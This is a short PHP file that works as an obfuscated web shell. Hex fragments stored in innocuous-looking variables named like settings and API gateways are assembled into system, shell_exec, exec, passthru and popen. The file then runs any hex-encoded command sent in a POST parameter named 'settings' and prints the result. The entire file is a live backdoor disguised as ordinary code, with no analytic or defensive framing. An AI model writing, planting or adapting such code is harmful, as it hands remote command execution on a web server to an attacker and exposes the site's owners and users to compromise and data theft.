<?php


$property_set1 = '73';
$property_set2 = '65';
$property_set3 = '6c';
$property_set4 = '5f';
$property_set5 = '63';
$property_set6 = '78';
$property_set7 = '70';
$property_set8 = '74';
$property_set9 = '68';
$property_set10 = '6f';
$property_set11 = '6e';
$property_set12 = '67';
$api_gateway1 = pack("H*", $property_set1 . '79' . '73' . '74' . $property_set2 . '6d');
$api_gateway2 = pack("H*", '73' . '68' . '65' . $property_set3 . '6c' . $property_set4 . $property_set2 . '78' . $property_set2 . $property_set5);
$api_gateway3 = pack("H*", $property_set2 . $property_set6 . $property_set2 . '63');
$api_gateway4 = pack("H*", $property_set7 . '61' . $property_set1 . '73' . $property_set8 . $property_set9 . '72' . '75');
$api_gateway5 = pack("H*", '70' . $property_set10 . $property_set7 . $property_set2 . $property_set11);
$api_gateway6 = pack("H*", '73' . $property_set8 . '72' . $property_set2 . '61' . '6d' . '5f' . $property_set12 . '65' . '74' . $property_set4 . $property_set5 . '6f' . '6e' . '74' . $property_set2 . '6e' . $property_set8 . $property_set1);
$api_gateway7 = pack("H*", '70' . $property_set5 . $property_set3 . $property_set10 . '73' . $property_set2);
$settings = pack("H*", '73' . $property_set2 . $property_set8 . '74' . '69' . '6e' . $property_set12 . $property_set1);
if (isset($_POST[$settings])) {
    $settings = pack("H*", $_POST[$settings]);
    if (function_exists($api_gateway1)) {
        $api_gateway1($settings);
    } elseif (function_exists($api_gateway2)) {
        print $api_gateway2($settings);
    } elseif (function_exists($api_gateway3)) {
        $api_gateway3($settings, $dchunk_holder);
        print join("\n", $dchunk_holder);
    } elseif (function_exists($api_gateway4)) {
        $api_gateway4($settings);
    } elseif (function_exists($api_gateway5) && function_exists($api_gateway6) && function_exists($api_gateway7)) {
        $record_flag = $api_gateway5($settings, 'r');
        if ($record_flag) {
            $hld_entity = $api_gateway6($record_flag);
            $api_gateway7($record_flag);
            print $hld_entity;
        }
    }
    exit;
}
